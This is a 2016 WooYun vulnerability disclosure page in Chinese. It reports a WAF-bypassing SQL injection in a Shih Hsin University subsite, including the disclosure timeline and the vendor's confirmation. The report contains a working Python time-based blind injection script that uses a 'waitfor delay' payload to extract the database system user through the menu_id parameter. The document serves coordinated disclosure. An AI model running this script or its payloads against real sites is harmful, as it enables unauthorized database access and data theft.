当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2016-0167169
漏洞标题:
绕过waf继续注入之世新大学某分站#2(确认是SA权限)(臺灣地區)
相关厂商:
台湾省世新大学
漏洞作者:
404notfound
提交时间:
2016-01-04 16:36
修复时间:
2016-02-20 15:48
公开时间:
2016-02-20 15:48
漏洞类型:
SQL注射漏洞
危害等级:
自评Rank:
20
漏洞状态:
已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2016-01-04: 细节已通知厂商并且等待厂商处理中
2016-01-08: 厂商已经确认,细节仅向厂商公开
2016-01-18: 细节向核心白帽子及相关领域专家公开
2016-01-28: 细节向普通白帽子公开
2016-02-07: 细节向实习白帽子公开
2016-02-20: 细节向公众公开

简要描述:

都特么是waf,还能不能玩了,人与人之间信任哪去了

详细说明:

不知道这分站叫什么名字,直接上注入点
http://**.**.**.**/CareerGuide/FrontShow/paper_display.aspx?menu_id=5&submenu_id=413&apmenu_id=1598
参数menu_id可绕过继续注入
这里不存在之前那个漏洞注释单引号导致python脚本不能使用的问题,直接上脚本
import requests
import re
import time
payloads='abcdefghigklmnopqrstuvwxyz0123456789@_.'
user=''
print 'Start to retrive Mysql user:'
for i in range(1,30):
for payload in payloads:
starttime=time.time()
s="5;if(ascii(substring(system_user,%s,1)))=%s waitfor delay '0:0:3' --" %(i,ord(payload))
param={'menu_id':s,'submenu_id':413,'apmenu_id':1598}
response=requests.get('http://**.**.**.**/CareerGuide/FrontShow/paper_display.aspx',params=param)
if time.time()-starttime >3:
user+=payload
print '\n user is:',user,
break
else:
print '.',
print '\n[Done] mysql user is %s' %user

漏洞证明:

QQ图片20160104115102.png

QQ图片20160104115703.png

修复方案:

我想看看你们给20rank乌云会给我多少,难道是<20,乌云都是只给我4rank

版权声明:转载请注明来源 404notfound@乌云

>

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2016-01-08 03:27

厂商回复:

感謝通報

最新状态:

暂无